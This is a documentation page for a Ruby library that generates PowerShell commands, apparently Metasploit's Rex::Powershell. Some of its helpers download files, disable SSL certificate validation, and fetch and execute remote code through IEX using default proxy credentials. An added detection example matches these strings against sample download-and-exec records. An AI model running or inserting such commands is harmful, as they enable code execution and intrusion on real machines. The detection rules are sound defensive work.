module Rex::Powershell::PshMethods
Convenience methods for generating powershell code in Ruby
Public Class Methods
Download file via .NET WebClient
@param src [String] URL to the file
@param target [String] Location to save the file
@return [String] Powershell code to download a file
# File lib/rex/powershell/psh_methods.rb, line 16
def self.download(src, target)
  target ||= '$pwd\\' << src.split('/').last
  %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
end
Return last time of login
@param user [String] Username
@return [String] Powershell code to return the last time of a user login
# File lib/rex/powershell/psh_methods.rb, line 62
def self.get_last_login(user)
  %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
end
Disable SSL Certificate verification
@return [String] Powershell code to disable SSL verification checks.
# File lib/rex/powershell/psh_methods.rb, line 71
def self.ignore_ssl_certificate
  '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
end
Use the default system web proxy and credentials to download a URL as a string and execute the contents as PowerShell
@param url [String] string to download
@return [String] PowerShell code to download a URL
# File lib/rex/powershell/psh_methods.rb, line 82
def self.proxy_aware_download_and_exec_string(url)
  var = Rex::Text.rand_text_alpha(1)
  cmd = "$#{var}=new-object net.webclient;"
  cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
  cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
  cmd << "IEX $#{var}.downloadstring('#{url}');"
  cmd
end
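The strings returned by download, ignore_ssl_certificate and proxy_aware_download_and_exec_string are fixed apart from the interpolated values, so they can be matched in logged PowerShell script text. The following is an added example, not part of rex-powershell: the module name PshMethodsDetector, the {id:, text:} record shape and the example.test URLs are assumptions made for the illustration.

```ruby
# Added example, not rex-powershell code: match the literal PowerShell that the
# PshMethods helpers on this page emit. PowerShell is case-insensitive (/i).
module PshMethodsDetector # hypothetical name
  RULES = {
    # ignore_ssl_certificate: validation callback replaced by an always-true block
    cert_validation_disabled:
      /ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}/i,
    # proxy_aware_download_and_exec_string: downloaded string handed to IEX.
    # The helper's variable name is random, so the rule does not depend on it.
    download_and_exec:
      /\b(?:IEX|Invoke-Expression)\b[^;]*\.DownloadString\s*\(/i,
    # proxy_aware_download_and_exec_string: system proxy plus default credentials
    proxy_default_credentials:
      /GetSystemWebProxy\(\).*CredentialCache\]::DefaultCredentials/im,
    # download: WebClient.DownloadFile writing to disk
    webclient_download_file:
      /new-object\s+(?:System\.)?Net\.WebClient\s*\)?\s*\.DownloadFile\s*\(/i
  }.freeze

  # Names of the rules that match, in RULES order.
  def self.scan(script_text)
    RULES.select { |_name, re| re.match?(script_text) }.keys
  end

  # records: [{id:, text:}] (assumed shape for exported script block log
  # entries). Returns {id => [rule names]} for records with at least one hit.
  def self.triage(records)
    records.to_h { |r| [r[:id], scan(r[:text])] }.reject { |_id, hits| hits.empty? }
  end
end

# Constructed sample records; example.test is a placeholder host.
SAMPLES = [
  { id: 1, text: '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};' },
  { id: 2, text: '$q=new-object net.webclient;$q.proxy=[Net.WebRequest]::GetSystemWebProxy();' \
                 '$q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;' \
                 "IEX $q.downloadstring('http://example.test/a');" },
  { id: 3, text: '(new-object System.Net.WebClient).DownloadFile("http://example.test/f", "$pwd\\f")' },
  { id: 4, text: 'Get-Process | Sort-Object CPU | Select-Object -First 5' }
].freeze

if __FILE__ == $PROGRAM_NAME
  PshMethodsDetector.triage(SAMPLES).each { |id, hits| puts "record #{id}: #{hits.join(', ')}" }
end
```

The rules key on the fixed API names rather than on variable names or URLs, which change per invocation.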
Create secure string from plaintext
@param str [String] String to create as a SecureString
@return [String] Powershell code to create a SecureString
# File lib/rex/powershell/psh_methods.rb, line 40
def self.secure_string(str)
  %Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$)
end
Uninstall app, or anything named like app
@param app [String] Name of application
@param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to the application name
@return [String] Powershell code to uninstall an application
# File lib/rex/powershell/psh_methods.rb, line 29
def self.uninstall(app, fuzzy = true)
  match = fuzzy ? '-like' : '-eq'
  %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
end
Find PID of file lock owner
@param filename [String] Filename
@return [String] Powershell code to identify the PID of a file lock owner
# File lib/rex/powershell/psh_methods.rb, line 51
def self.who_locked_file(filename)
  %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
end